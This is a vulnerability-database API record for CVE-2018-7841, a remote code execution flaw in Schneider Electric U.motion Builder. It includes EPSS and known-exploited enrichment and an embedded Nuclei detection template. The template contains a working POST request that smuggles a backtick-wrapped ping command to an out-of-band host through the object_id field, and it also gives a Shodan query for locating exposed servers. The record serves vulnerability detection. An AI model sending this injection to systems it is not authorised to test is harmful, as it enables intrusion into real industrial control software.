{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-7841/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-7841/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-7841/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-7841/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-7841/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-7841"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-7841"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.72675,
      "kev": true,
      "percentile": 0.9942
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2018/CVE-2018-7841.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2018-7841\n\ninfo:\n  name: Schneider Electric U.motion Builder - Remote Code Execution\n  author: darses,rcesecurity\n  severity: critical\n  description: |\n    U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.\n  impact: |\n    Attackers can execute arbitrary system commands on the server, potentially leading to complete system compromise, data theft, service disruption, or lateral movement within the network.\n  remediation: |\n    The product has been retired and is no longer available or supported. To further protect their installations from this threat, customers should immediately remove the U.motion Builder software from their systems.\n  reference:\n    - https://www.exploit-db.com/exploits/46846\n    - https://packetstorm.news/files/id/152862\n    - https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day\n    - https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2017-178-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2019-071-02-Umotion-Builder.pdf\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-7841\n    cwe-id: CWE-78\n    epss-score: 0.72675\n    epss-percentile: 0.99419\n    cpe: cpe:2.3:a:schneider-electric:u.motion_builder:1.3.4:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-requests: 1\n    vendor: schneider-electric\n    product: u.motion_builder\n    shodan-query: http.headers_hash:1985490094\n  tags: cve,cve2018,schneider-electric,rce,kev,oast,oob,vkev,vuln\n\nvariables:\n  oast: \"{{interactsh-url}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        op=export&language=english&interval=1&object_id=`ping -c 1 {{interactsh-url}}`\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(interactsh_protocol, 'dns')\n          - contains(content_type, \"application/octet-stream\")\n          - status_code == 200\n        condition: and\n# digest: 4a0a0047304502205b89b1efd669fdd4da69d12830f43e726275b5a037ea6b62bf51c618676a6be5022100a0a26017f95357933f80dba4d23d85f9faa480e3f82a34513bfd367dc4cddce2:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2018-7841"
}